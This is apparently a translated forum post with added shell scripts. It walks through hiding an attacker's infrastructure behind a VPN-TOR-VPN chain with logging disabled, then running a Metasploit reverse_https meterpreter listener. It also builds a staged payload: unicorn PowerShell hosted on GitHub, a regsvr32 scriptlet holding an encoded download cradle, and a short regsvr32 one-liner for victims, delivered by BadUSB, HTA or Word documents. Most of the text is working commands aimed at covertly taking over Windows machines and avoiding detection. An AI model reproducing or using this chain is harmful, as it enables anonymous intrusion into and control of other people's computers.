sudo vi /etc/ssh/sshd_config

sudo vi /etc/openvpn/server.conf



sudo ufw allow 2375

sudo ufw allow 2376





sudo vi /etc/openvpn/server.conf

sudo vi /etc/ssh/sshd_config





sudo systemctl restart ssh

sudo systemctl restart openvpn@server



sudo vi /etc/openvpn/client.conf

Disable VPN logging

ssh vpnsrv1

sudo vi /etc/openvpn/server.conf

;status openvpn-status.log




sudo vi /etc/openvpn/client.conf

verb 0

sudo systemctl restart openvpn@client

sudo systemctl restart openvpn@server

The same on SRV2.

Prepare for the attack

Bash:
echo 'deb http://downloads.metasploit.com/data/releases/metasploit-framework/apt jessie main' | sudo tee /etc/apt/sources.list.d/metasploit-framework.list
# apt-key is deprecated on current Debian/Ubuntu releases; this is the key import the post used
wget -qO - http://apt.metasploit.com/metasploit-framework.gpg.key | sudo apt-key add -
sudo apt update && sudo apt dist-upgrade
sudo apt install metasploit-framework postgresql -y

Bash:
sudo systemctl start postgresql
msfdb init
# msfconsole will be started with sudo (to bind port 443), so let root see the same .msf4 database config
sudo ln -s /home/admin/.msf4/ /root/

Bash:
sudo apt install screen

Bash:
screen -S msf
sudo msfconsole

Screen manual

-S msf = set a session name

sudo msfconsole = the command run inside the screen session



#Send session to background

Ctrl+A then D



#background sessions list

screen -list



#Take a session back

screen -r msf



#msf = session name

Bash:
sudo ufw allow 443
sudo ufw allow 8443

Bash:
screen -S msf
sudo msfconsole
use multi/handler
set payload windows/meterpreter/reverse_https
set LPORT 443
curl ident.me; echo
set LHOST IP_address_of_SRV2
set ExitOnSession false
set EnableStageEncoding true
exploit -j

(curl ident.me prints the public IP of SRV2; that address goes into LHOST)

Payload delivery - Web Delivery

git clone https://github.com/trustedsec/unicorn.git

Next create stage2


(Links hidden from guests on the original forum)

Note: in the last parentheses put the raw URL of the stage3 file you uploaded to GitHub.

regsvr32 -s -n -u -i:https://raw.githubusercontent.com/XXXXXX/XXX/master/stage2 scrobj.dll



regsvr32 -s -n -u -i:http://bit.ly/XXXXX scrobj.dll

ssh vpnsrv2

screen -r msf

Hello again! In the last article we discussed building the VPN - TOR - VPN chain. Now let's prepare SRV2 for the pentest and try it out. One thing I forgot to mention in the first part: it is better to create SRV1 and SRV2 in two different locations, for example one in Frankfurt and the other in London.

Changing the SSH and OpenVPN ports to non-standard ones

Connect to SRV1 via SSH. Before changing the ports we have to allow the new ones in the firewall first. In this example SSH moves to port 4910 and OpenVPN to 4911. Then change the ports in /etc/ssh/sshd_config (Port) and /etc/openvpn/server.conf (port), restart the services and remove the old ports from the allowed rules.

Changing the ports on SRV2

It is advisable to use different ports on SRV1 and SRV2. On the second server in our example SSH will use port 2375 and OpenVPN 2376. Connect to SRV2 and change the SSH and VPN ports the same way as on SRV1. Restart only SSH at this point, or you will lose the connection: as soon as openvpn@server is restarted, the connection to SRV2 drops. Close the window and move on to the next step.

Back on SRV1, edit the client connection file for VPN SRV2 (/etc/openvpn/client.conf) to use the new port and restart the OpenVPN client:

sudo systemctl restart openvpn@client

The connection to SRV2 is restored.

Disabling VPN logging

In the first part I deliberately left logging on; the logs are needed for troubleshooting, but now that everything is set up correctly let's turn them off. On the server comment out the status line (;status openvpn-status.log); in the client config change verb 3 to verb 0.

OpenVPN client

Create a client config file for connecting to VPN SRV1. For talking to SRV2, ssh is quite enough, but for more comfort, and to send all our traffic through the VPN - TOR - VPN chain, let's set up a connection to VPN SRV1. We did not build it for nothing. Connect to SRV1.

In /home/openvpn-ca/client-configs/base.conf change the port to the one you set earlier in /etc/openvpn/server.conf (for VPN SRV1: 4911/udp). If you want to use one certificate on several devices at the same time, uncomment this line:

;duplicate-cn

Create the client config file for export, copy it to your local host (Kali Linux) and launch the VPN. Now all our traffic goes through the VPN - TOR - VPN chain!

Add the SRV2 entry to ~/.ssh/config. HostName must be exactly 10.8.1.1 (the VPN address of SRV2); never write the public IP of the second server here. Now, typing just ssh vpnsrv2 on our local host lands us on SRV2 through our anonymous chain.

Installing Metasploit Framework on SRV2

Go to SRV2 and install Metasploit Framework. If Metasploit is run as a normal user it cannot listen on privileged ports, which is why we symlinked .msf4 into root's home directory. The command to launch it is:

sudo msfconsole

Any program started over ssh is closed as soon as we exit the console, and we need the server to be ready 24 hours a day to receive guests with their candies, as DarkNode put it. For that we use the "screen" tool and launch msfconsole inside a screen session.

Listener

Set up the listener that will accept the reverse shell. Before that we have to tell the firewall to accept the port we are going to listen on. We accept the shell on port 443 (https) so that nothing about our side looks suspicious. Send msfconsole to the background (Ctrl+A then D) and go back to Kali Linux.

Payload delivery

This is not a new method; I learned it from DarkNode. We can change the payload on the infected host at any time.
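The port change, the logging switch-off, the ~/.ssh/config entry and the listener above, as an added example in shell (not code from the original post): idempotent functions that rewrite the config files in place, rotate a port in the order the post insists on (allow new, edit, restart, then delete old), and write the ssh host entry and an msfconsole resource script with the post's handler settings. The paths, ports, the admin user and 10.8.1.1 are the values the post uses; the rotate_port step is meant to be run as root on the server itself.

```shell
#!/bin/sh
# Added example, not from the original post: the SRV1/SRV2 steps as shell
# functions. Paths, ports, the "admin" user and 10.8.1.1 are the post's values.
set -eu

# Set "key value" in a config file: rewrites an existing active or commented
# line ("#Port 22" in sshd_config, ";duplicate-cn" in server.conf) or appends
# the line if the key is absent. Values must not contain '/'.
set_conf_value() {
    f=$1; k=$2; v=$3
    if grep -Eq "^[#;]?[[:space:]]*$k([[:space:]]|$)" "$f"; then
        sed -E "s/^[#;]?[[:space:]]*$k([[:space:]].*)?$/$k${v:+ $v}/" "$f" > "$f.tmp"
        cat "$f.tmp" > "$f"; rm -f "$f.tmp"   # keep the original inode and mode
    else
        printf '%s\n' "$k${v:+ $v}" >> "$f"
    fi
}

# Comment out every active "key ..." line with OpenVPN's ';' comment character.
comment_out() {
    f=$1; k=$2
    sed -E "s/^[[:space:]]*($k([[:space:]].*)?)$/;\1/" "$f" > "$f.tmp"
    cat "$f.tmp" > "$f"; rm -f "$f.tmp"
}

# Active value of a key (first uncommented match), empty if none.
get_conf_value() {
    grep -E "^[[:space:]]*$2([[:space:]]|$)" "$1" | head -n 1 | awk '{print $2}'
}

# Port change in the post's order: allow the new port first, rewrite the
# config, restart the service, and only then drop the old rule. The protocol
# is given explicitly: "ufw allow 2375" on its own opens both tcp and udp.
rotate_port() {
    f=$1; k=$2; old=$3; new=$4; proto=$5; unit=$6
    ufw allow "$new/$proto"
    set_conf_value "$f" "$k" "$new"
    systemctl restart "$unit"
    ufw delete allow "$old/$proto"
}

# Turn OpenVPN logging off: comment out the status file, set verb 0.
quiet_openvpn() {
    comment_out "$1" status
    set_conf_value "$1" verb 0
}

# ~/.ssh/config entry for SRV2. HostName is the VPN address of SRV2, never its
# public IP, so the hop always rides the VPN - TOR - VPN chain.
write_ssh_host() {
    cat >> "$1" <<EOF
Host vpnsrv2
    HostName 10.8.1.1
    Port $2
    User admin
EOF
}

# msfconsole resource script with the post's handler settings, so the listener
# comes back after a reboot with: sudo msfconsole -r handler.rc
write_handler_rc() {
    cat > "$1" <<EOF
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST $2
set LPORT 443
set ExitOnSession false
set EnableStageEncoding true
exploit -j
EOF
}

# SRV1 as in the post (run these on the server itself, as root):
# rotate_port /etc/ssh/sshd_config Port 22 4910 tcp ssh
# rotate_port /etc/openvpn/server.conf port 1194 4911 udp openvpn@server
# quiet_openvpn /etc/openvpn/server.conf
# set_conf_value /etc/openvpn/client.conf verb 0
```

Keep the current SSH session open and confirm the new port from a second terminal before rotate_port reaches the ufw delete step; if the new Port line is wrong you still have a way in. On SRV2 run the OpenVPN rotation last, because that restart drops the VPN link to SRV1 until client.conf on SRV1 points at the new port.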
We just need to change Stage3 and everything changes. We can also leave the victim alone for a while (make the Stage1 line empty): even with Wireshark no traces will be found. The next day just put Stage1 back and get the reverse shell again. You can also hand intercepted sessions over to a colleague.

Download unicorn from trustedsec for payload generation. Generate the payload, rename powershell_attack.txt to stage3 and upload it to GitHub (create a new account through our anonymous chain).

We need DarkNode's scripts: base64_convert and the XML script for regsvr32. I uploaded them (the links are hidden from guests on the original forum). Run ./base64_convert.py with an argument of this form:

IEX(New-Object Net.WebClient).DownloadString('<raw URL of stage3>')

Insert the resulting command into the XML script shown above and save it under the name "stage2". Upload it to GitHub too. Finally we get the stage2 link; if you shorten it on bit.ly it is more convenient.

Stage 1 is the command run on the victim's computer (there are many ways to deliver it: BadUSB, HTA, Word and so on). For a better understanding, with a shortened URL it looks like the regsvr32 one-liner above. Only about 50 characters can infect a computer.

Go to SRV2 and check whether the reverse shell handler received a session. Everything works!! We can also manage it from a phone: copy the ssh key from SRV1 to your phone, install OpenVPN, and you are in.

Source: Анонимный Pentest [VPN -> TOR -> VPN] (Часть II) - Reverse Shell за локальной сетью (Anonymous Pentest [VPN -> TOR -> VPN] (Part II) - Reverse Shell behind a local network)
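The three-stage chain above (stage3 = unicorn's PowerShell payload on GitHub, stage2 = the scriptlet carrying the encoded download cradle, stage1 = the regsvr32 one-liner), as an added example in shell. This is not DarkNode's base64_convert.py nor the hidden XML script: it assumes, as the post's use of the encoded command suggests, that base64_convert.py produces the UTF-16LE base64 form that powershell.exe -EncodedCommand expects, and that the scriptlet runs it as powershell -enc. The URLs are the post's placeholders.

```shell
#!/bin/sh
# Added example, not from the original post, DarkNode or unicorn. Assumption:
# base64_convert.py yields the UTF-16LE base64 that "powershell -enc" takes.
set -eu

# Stage 2 body: the download cradle that fetches stage3 (unicorn's
# powershell_attack.txt) from its raw GitHub URL and runs it in memory.
cradle() {
    printf "IEX(New-Object Net.WebClient).DownloadString('%s')" "$1"
}

# UTF-16LE encoding of an ASCII string: every byte followed by a NUL byte.
# Built from printf and fold only, so it works where iconv is missing.
utf16le_ascii() {
    printf '%s\n' "$1" | fold -w 1 | while IFS= read -r c; do
        printf '%s\0' "$c"
    done
}

# The -EncodedCommand form: base64 over the UTF-16LE bytes, no line breaks.
# An encoded command that starts with "IEX" always begins "SQBFAFgA".
ps_encode() {
    utf16le_ascii "$1" | base64 | tr -d '\n'
}

# What the stage2 scriptlet ends up executing on the victim (assumed form).
stage2_command() {
    printf 'powershell -enc %s' "$(ps_encode "$(cradle "$1")")"
}

# Stage 1: the one-liner run on the victim; the argument is the raw URL of the
# stage2 scriptlet, or its bit.ly short form.
stage1() {
    printf 'regsvr32 -s -n -u -i:%s scrobj.dll' "$1"
}

# Length of the stage-1 line: the "about 50 characters" the post mentions.
stage1_length() {
    stage1 "$1" | wc -c | tr -d ' '
}

# Walk-through with the post's placeholder URLs:
stage3_url='https://raw.githubusercontent.com/XXXXXX/XXX/master/stage3'
stage2_url='http://bit.ly/XXXXX'
echo "stage2 runs   : $(stage2_command "$stage3_url")"
echo "stage1 line   : $(stage1 "$stage2_url")"
echo "stage1 length : $(stage1_length "$stage2_url")"
```

Swapping the payload later means regenerating only stage3; stage2's encoded cradle and the stage1 line stay unchanged, which is why the post can leave the victim alone and come back the next day. Replace the placeholder URLs with your own before use.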